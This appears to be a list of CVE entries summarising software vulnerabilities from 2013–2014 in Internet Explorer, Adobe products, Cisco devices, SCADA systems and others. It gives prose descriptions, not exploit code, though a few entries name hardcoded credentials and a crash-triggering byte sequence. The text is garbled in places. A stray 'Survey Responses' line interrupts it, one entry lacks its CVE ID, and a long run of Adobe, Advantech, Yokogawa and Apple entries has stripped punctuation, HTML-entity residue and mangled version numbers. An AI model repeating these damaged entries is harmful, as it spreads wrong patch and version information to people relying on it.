CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS_SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X and before 11.2.202.356 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
